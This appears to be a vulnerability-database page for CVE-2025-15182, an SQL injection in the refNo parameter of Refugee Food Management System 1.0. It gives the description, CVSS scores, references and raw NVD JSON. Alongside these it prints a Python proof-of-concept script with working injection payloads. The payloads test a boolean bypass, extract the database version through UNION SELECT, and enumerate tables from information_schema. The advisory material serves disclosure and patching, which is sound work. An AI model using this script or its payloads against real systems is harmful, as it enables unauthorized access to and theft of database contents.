CVE-2025-15182

Description

A weakness has been identified in code-projects Refugee Food Management System 1.0. This affects an unknown function of the file /home/served.php. Executing manipulation of the argument refNo can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:refugee_food_management_system:1.0:*:*:*:*:*:*:* - VULNERABLE

Refugee Food Management System 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-15182 SQL Injection PoC
# Target: code-projects Refugee Food Management System 1.0
# File: /home/served.php
# Parameter: refNo

import requests
import sys

TARGET_URL = "http://target.com/home/served.php"

# Basic SQL Injection test
def test_basic_injection():
    print("[*] Testing basic SQL injection...")
    payload = "' OR '1'='1"
    params = {"refNo": payload}
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Basic injection test completed")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Union-based injection to extract database version
def extract_db_version():
    print("[*] Extracting database version...")
    payload = "' UNION SELECT NULL,version(),NULL,NULL-- -"
    params = {"refNo": payload}
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        if "5." in response.text or "8." in response.text:
            print("[+] Database version extracted")
            return True
    except Exception as e:
        print(f"[-] Error: {e}")
    return False

# Extract database tables
def extract_tables():
    print("[*] Extracting database tables...")
    payload = "' UNION SELECT NULL,table_name,NULL,NULL FROM information_schema.tables WHERE table_schema=database()-- -"
    params = {"refNo": payload}
    try:
        response = requests.get(TARGET_URL, params=params, timeout=10)
        if response.status_code == 200:
            print("[+] Tables extracted")
            return response.text
    except Exception as e:
        print(f"[-] Error: {e}")
    return None

if __name__ == "__main__":
    print("CVE-2025-15182 SQL Injection PoC")
    print("=" * 40)
    test_basic_injection()
    extract_db_version()
    tables = extract_tables()
    if tables:
        print(f"[+] Found tables: {tables[:500]}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-15182
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-15182
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-15182/
[4] VulDB https://vuldb.com/cve/CVE-2025-15182
[5] https://code-projects.org/
[6] https://github.com/ctg503/CVE/issues/2
[7] https://vuldb.com/?ctiid.338567
[8] https://vuldb.com/?id.338567
[9] https://vuldb.com/?submit.721272

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-15182", "sourceIdentifier": "[email protected]", "published": "2025-12-29T10:15:41.920", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in code-projects Refugee Food Management System 1.0. This affects an unknown function of the file /home/served.php. Executing manipulation of the argument refNo can lead to sql injection. The attack can be executed remotely. The exploit has been made available to the public and could be exploited."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:refugee_food_management_system:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "139EB45E-C3B2-4D66-9726-407503660379"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/ctg503/CVE/issues/2", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?ctiid.338567", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry", "Permissions Required"]}, {"url": "https://vuldb.com/?id.338567", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.721272", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}